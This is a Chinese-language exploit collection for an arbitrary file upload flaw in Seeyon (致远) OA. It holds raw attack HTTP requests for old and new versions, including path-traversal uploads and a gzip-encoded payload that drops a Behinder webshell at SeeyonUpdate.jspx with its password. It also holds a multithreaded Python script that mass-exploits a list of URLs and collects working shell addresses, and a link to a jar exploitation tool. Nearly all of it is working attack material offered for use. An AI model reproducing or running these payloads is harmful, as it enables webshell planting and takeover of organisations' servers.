致远OA 任意文件上传
老版本
POST /seeyon/pdfservlet HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=04C25979C4EA3AF182B9F96F6F080198; Host: 182.106.224.184:808 Content-type: application/x-www-form-urlencoded Content-Length: 388 Connection: close DBSTEP V3.0 330 0 104 DBSTEP=OKMLlKlV OPTION=S3WYOSyMLKS6 newPdfFileId=wV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 aaaa POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=04C25979C4EA3AF182B9F96F6F080198; Host: 182.106.224.184:808 Content-type: application/x-www-form-urlencoded Content-Length: 50 Connection: close method=uploadMenuIcon&fileid=1&filename=upload.jsp
新版本
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 Host: xxxxxx Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=04C25979C4EA3AF182B9F96F6F080198; UM_distinctid=17490a07027c4d-030a052b247d49-31697004-13c680-17490a07028c60; loginPageURL="" Content-Type: application/x-www-form-urlencoded Content-Length: 3562 managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BC%7E%C2%98%26e%C3%A7%C3%A1%27%3As%C3%B7%24%0D%3C%C2%8CkWvbr%03%C2%B3%C2%A4r%C2%B91%2B-%C2%83%C3%8C%15%C2%85%C3%9B%C2%96%C3%942%169K%C2%95%05%C2%B3%C2%B8XsI%00%C3%89%3C%07%C2%BC%C2%9E%C2%AF%C2%89R%C2%B8%C3%9AX%3E%0E%5E%C2%8A%C2%A3%C2%B8%C2%88lM%C3%B2%21%C3%91%2B%C3%80%C3%A1%C3%82%0DY%C2%B4%C3%91%C2%86%C2%95%14%0E%C2%9F%C2%9DH%C2%B9n%C2%89%C2%9A%00%C2%A2%C2%87P%C3%84%C2%9C%C2%AD%09W%C3%8B%C2%80X%12q%06%C3%84q%05k%7C%C2%B2%C3%A0%2CM%18%C3%90%C3%B7t%C2%8D%C3%A2%C2%B4%C3%A1M%3F%C2%B7%C3%B8%C2%95%00%C2%96j%C3%B1%C2%A9%C2%8C%C3%A2%C3%9A%C3%86%26%C2%97%C2%91T%C3%AC%C3%82%C3%B2%1F%C3%80%C2%BF%7C%C2%B3E%3Dt%C3%85Ee%C2%99j%C3%A2r%C3%83GITR%C3%8BTn%C3%92%C3%A2%C3%A8%C3%9Bf%C3%80%C3%9A%C2%86p%06%C3%95dFun%C2%80-%0B%C3%8BP1%C2%882%5D%C2%9E%C2%B7z%07q%1CP%C2%8CJ%127%C2%89%C3%87%2B%03%40i%C2%99%C3%92%5B%7Ep%C2%85%C3%86*u%C2%8C%C2%8D%C2%BF%C3%A7%C3%8A%00%C3%B0%1B%C3%9F%C2%AE%02%C3%A4%C2%99*%C2%96%16%19%C2%B4%10%1E%C3%91%C3%B8Xh%C2%AEri%C3%99%C3%9A%C2%AD%C2%89%C2%8Am%C2%82s%C3%BB%C3%98b%C3%8B%C2%A2%C2%94n%C2%A6%25Z%C2%93%12%C2%BB%04%C2%B2%C3%8E%C3%B4%3C%3A%C2%99%C3%AC3%C3%8Di%C2%9D%C3%B7%C2%B3m%C3%94z%C2%AB%C2%80%C3%A6%C2%80%C3%A6%C3%AF%C2%9E%C2%B7H%09%01%C3%81W%28%C2%96%18%C3%8E%C2%84%03%5C%C2%AE%12%C2%97%00%C3%9F%C2%B9%C2%B1%C3%88%3E%C3%AC%07%C3%B6aSm%0D%1B%5B%C2%A1%7E%C3%9E%1E%C2%A4%C2%81%C2%85%C2%A4%11%C3%A0%C3%B4%5BS%03%24%5C%C2%A1%C2%A9%1A%C2%96Q%0El%C3%8DGP%C2%93R%C2%A7%3A%C2%8F%C3%B6%1C%C2%BE%3Am%C2%8C%C3%A37zM+%C2%86sL%C3%AB%C2%AA%06.Q%C2%B0%3C%5DMT%7D%C2%83%C3%A4C%16%C2%AEi%0C%C2%8E%C2%B9%C2%8F7%C2%A8%C3%8Cm%13%C3%B8GN%0F%C3%ABX5N%17%C2%8E%C3%BC%04%5B%C2%95%1F%7F%C3%B83%C2%B2%7F%C3%BD3%C2%91%2B%09%C3%89Z%23%C2%9F%C3%96%C3%B9%02%C2%95%C2%9F%C2%AC%C3%9F%C3%B0%C2%B5%C3%B3%C3%88%25%3AO%C3%AB%13C1H%40%C3%95%C3%A8%C2%B5%C3%B5%C2%A9%C3%B5%1A%C2%BF%7E%C2%AD%C2%8D%3C%3DS9%C2%88%C2%ADJ8%C2%BB%C2%ACM%C3%B3%C2%B1HeQ%C3%80%C2%B0%C2%9A%C3%9C%C2%A01%C3%8C%5D%03%C3%9F%C3%A8%C3%9Bt%C2%AF%2B%0B%25T%C3%A74%C2%AF%C3%85%C3%9D.o%C3%BA%C2%83S%C3%B1%3E%C3%92%C2%89M%7BU%5E%C2%AE00u%0C%C3%B8%7Dns%3A%7B%24%C3%BA%C3%9B%1F9%C2%A8i%3A%C2%BC.9%C3%86%C3%94%C3%8F%C2%84%C3%86%40%C3%A3%C2%87%2B7RX%C3%8B%10B%1A%1F%C3%B5C%2F%C2%A1%C2%B1HA%154%3D%C2%BD%C3%A7%C3%869%14%C3%B5%21%C2%A4%C2%B5%C3%9DM%C3%87MO%02N%C2%A9%1Cs%C3%82%C2%BA%C2%A2%C3%8E%C3%AE%C3%82k%C3%91%C3%96uU%C2%B8%C3%BC%C3%BE%C3%B1%7D%C3%98%C2%994%C2%8F%C3%BA%04%C2%A5%C2%A0%3Fy%C3%91%C3%A6%C3%9F%C2%863%0F%C3%84%C2%90%C3%8E%3B%C2%BC%C3%9F%C3%AD%C2%A8%7F%C2%AE%C3%94%C3%BB%C3%AFT%C2%B7fw%C2%A6%C2%B5m%C2%99%C3%9E%1D%C2%B0%C3%9F%C3%9E%C2%93%C3%BCt%C2%A2%00%C3%8D%12x%C3%B8%C3%929%1E%16_%C2%9F%3F.%C2%89%C2%8F%C3%AB%C2%A6%C3%9F08%C3%AA%7D%04%C3%BF%3F%5D%C2%80%C3%A3%C3%94%C2%A3%C2%8E%C3%BD%C3%B8%5E%C2%AFCJ%40%C3%AF%C3%84%C2%A4%C2%99%C2%93%21%C3%80%C2%94e%C3%99%7Bx%C3%AD%C3%BE%C2%A0%3B%C2%92%C3%AE%C3%89%C3%97%C3%BA%C3%8E.%C2%B9%C3%97%C3%BD%C3%BB_%C2%83%C2%B9ok%5E%05%00%00
http://xxxx0//seeyon/SeeyonUpdate.jspx rebeyond 冰蝎3
Python 脚本
#coding:utf-8
import re
import queue
import threading
import requests
import time
requests.packages.urllib3.disable_warnings()
webqueue = queue.Queue()
mutex = threading.Lock()
GOODURL = []
class HttpScan(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self._queue = queue
def gettile(self,url, proxy=None, timeout=20):
global GOODURL
# try:
if "://" not in url:
url = "http://{}".format(url)
headers = {
'Connection': 'close',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch, br',
'Accept-Language': 'zh-CN,zh;q=0.8',
"Content-Type": "application/x-www-form-urlencoded"
}
proxy = None
proxy = {'http': '127.0.0.1:8080','https': '127.0.0.1:8080'}
data = r"managerMethod=1&arguments=1"
payload = """managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BC%7E%C2%98%26e%C3%A7%C3%A1%27%3As%C3%B7%24%0D%3C%C2%8CkWvbr%03%C2%B3%C2%A4r%C2%B91%2B-%C2%83%C3%8C%15%C2%85%C3%9B%C2%96%C3%942%169K%C2%95%05%C2%B3%C2%B8XsI%00%C3%89%3C%07%C2%BC%C2%9E%C2%AF%C2%89R%C2%B8%C3%9AX%3E%0E%5E%C2%8A%C2%A3%C2%B8%C2%88lM%C3%B2%21%C3%91%2B%C3%80%C3%A1%C3%82%0DY%C2%B4%C3%91%C2%86%C2%95%14%0E%C2%9F%C2%9DH%C2%B9n%C2%89%C2%9A%00%C2%A2%C2%87P%C3%84%C2%9C%C2%AD%09W%C3%8B%C2%80X%12q%06%C3%84q%05k%7C%C2%B2%C3%A0%2CM%18%C3%90%C3%B7t%C2%8D%C3%A2%C2%B4%C3%A1M%3F%C2%B7%C3%B8%C2%95%00%C2%96j%C3%B1%C2%A9%C2%8C%C3%A2%C3%9A%C3%86%26%C2%97%C2%91T%C3%AC%C3%82%C3%B2%1F%C3%80%C2%BF%7C%C2%B3E%3Dt%C3%85Ee%C2%99j%C3%A2r%C3%83GITR%C3%8BTn%C3%92%C3%A2%C3%A8%C3%9Bf%C3%80%C3%9A%C2%86p%06%C3%95dFun%C2%80-%0B%C3%8BP1%C2%882%5D%C2%9E%C2%B7z%07q%1CP%C2%8CJ%127%C2%89%C3%87%2B%03%40i%C2%99%C3%92%5B%7Ep%C2%85%C3%86*u%C2%8C%C2%8D%C2%BF%C3%A7%C3%8A%00%C3%B0%1B%C3%9F%C2%AE%02%C3%A4%C2%99*%C2%96%16%19%C2%B4%10%1E%C3%91%C3%B8Xh%C2%AEri%C3%99%C3%9A%C2%AD%C2%89%C2%8Am%C2%82s%C3%BB%C3%98b%C3%8B%C2%A2%C2%94n%C2%A6%25Z%C2%93%12%C2%BB%04%C2%B2%C3%8E%C3%B4%3C%3A%C2%99%C3%AC3%C3%8Di%C2%9D%C3%B7%C2%B3m%C3%94z%C2%AB%C2%80%C3%A6%C2%80%C3%A6%C3%AF%C2%9E%C2%B7H%09%01%C3%81W%28%C2%96%18%C3%8E%C2%84%03%5C%C2%AE%12%C2%97%00%C3%9F%C2%B9%C2%B1%C3%88%3E%C3%AC%07%C3%B6aSm%0D%1B%5B%C2%A1%7E%C3%9E%1E%C2%A4%C2%81%C2%85%C2%A4%11%C3%A0%C3%B4%5BS%03%24%5C%C2%A1%C2%A9%1A%C2%96Q%0El%C3%8DGP%C2%93R%C2%A7%3A%C2%8F%C3%B6%1C%C2%BE%3Am%C2%8C%C3%A37zM+%C2%86sL%C3%AB%C2%AA%06.Q%C2%B0%3C%5DMT%7D%C2%83%C3%A4C%16%C2%AEi%0C%C2%8E%C2%B9%C2%8F7%C2%A8%C3%8Cm%13%C3%B8GN%0F%C3%ABX5N%17%C2%8E%C3%BC%04%5B%C2%95%1F%7F%C3%B83%C2%B2%7F%C3%BD3%C2%91%2B%09%C3%89Z%23%C2%9F%C3%96%C3%B9%02%C2%95%C2%9F%C2%AC%C3%9F%C3%B0%C2%B5%C3%B3%C3%88%25%3AO%C3%AB%13C1H%40%C3%95%C3%A8%C2%B5%C3%B5%C2%A9%C3%B5%1A%C2%BF%7E%C2%AD%C2%8D%3C%3DS9%C2%88%C2%ADJ8%C2%BB%C2%ACM%C3%B3%C2%B1HeQ%C3%80%C2%B0%C2%9A%C3%9C%C2%A01%C3%8C%5D%03%C3%9F%C3%A8%C3%9Bt%C2%AF%2B%0B%25T%C3%A74%C2%AF%C3%85%C3%9D.o%C3%BA%C2%83S%C3%B1%3E%C3%92%C2%89M%7BU%5E%C2%AE00u%0C%C3%B8%7Dns%3A%7B%24%C3%BA%C3%9B%1F9%C2%A8i%3A%C2%BC.9%C3%86%C3%94%C3%8F%C2%84%C3%86%40%C3%A3%C2%87%2B7RX%C3%8B%10B%1A%1F%C3%B5C%2F%C2%A1%C2%B1HA%154%3D%C2%BD%C3%A7%C3%869%14%C3%B5%21%C2%A4%C2%B5%C3%9DM%C3%87MO%02N%C2%A9%1Cs%C3%82%C2%BA%C2%A2%C3%8E%C3%AE%C3%82k%C3%91%C3%96uU%C2%B8%C3%BC%C3%BE%C3%B1%7D%C3%98%C2%994%C2%8F%C3%BA%04%C2%A5%C2%A0%3Fy%C3%91%C3%A6%C3%9F%C2%863%0F%C3%84%C2%90%C3%8E%3B%C2%BC%C3%9F%C3%AD%C2%A8%7F%C2%AE%C3%94%C3%BB%C3%AFT%C2%B7fw%C2%A6%C2%B5m%C2%99%C3%9E%1D%C2%B0%C3%9F%C3%9E%C2%93%C3%BCt%C2%A2%00%C3%8D%12x%C3%B8%C3%929%1E%16_%C2%9F%3F.%C2%89%C2%8F%C3%AB%C2%A6%C3%9F08%C3%AA%7D%04%C3%BF%3F%5D%C2%80%C3%A3%C3%94%C2%A3%C2%8E%C3%BD%C3%B8%5E%C2%AFCJ%40%C3%AF%C3%84%C2%A4%C2%99%C2%93%21%C3%80%C2%94e%C3%99%7Bx%C3%AD%C3%BE%C2%A0%3B%C2%92%C3%AE%C3%89%C3%97%C3%BA%C3%8E.%C2%B9%C3%97%C3%BD%C3%BB_%C2%83%C2%B9ok%5E%05%00%00"""
vul = url + "/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"
req = requests.get(url, headers=headers,proxies=proxy, timeout=timeout,verify=False)
# req = requests.post(vul, headers=headers,data=data,proxies=proxy, timeout=timeout,verify=False)
print(vul,req.status_code)
if req.status_code != 404:
if 1:
try:
req = requests.post(vul, headers=headers,data=payload,proxies=proxy, timeout=timeout,verify=False)
except Exception as e:
print(url,e)
try:
shellurl = url + "/seeyon/SeeyonUpdate.jspx"
req = requests.get(shellurl, headers=headers,proxies=proxy, timeout=timeout,verify=False)
print(shellurl,req.status_code)
if req.status_code !=404:
GOODURL.append(shellurl)
except Exception as e:
print(url,e)
pass
# except Exception as e:
# print(e)
# # log=("%-30s| %-20s" % (url, e))
# # print(log)
# pass
def run(self):
while not self._queue.empty():
# try:
queue_task = self._queue.get(timeout=0.5)
url = queue_task.strip()
self.gettile(url)
time.sleep(0.01)
# except:
# pass
def run_http(webqueue,threadNum =100):
threads = []
for num in range(1,threadNum + 1):
threads.append(HttpScan(webqueue))
for t in threads:
t.start()
for t in threads:
t.join()
# f = open("port.txt","r")
def main():
if 0:
import sys
if len(sys.argv) ==2:
filename = sys.argv[1]
else:
filename = "url.txt"
f = open(filename,"r")
urls = []
for url in f:
url = url.strip()
if "://" not in url:
url = "http://{}".format(url)
url = re.findall('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url)[0]
urls.append(url)
urls = list(set(urls))
f.close()
for url in urls:
if len(url) >5:
webqueue.put(url)
if 1:
url = "http://xxxxx"
webqueue.put(url)
print(url)
run_http(webqueue)
main()
jar 利用工具
https://www.o2oxy.cn/wp-content/uploads/2021/01/2021-01.rar
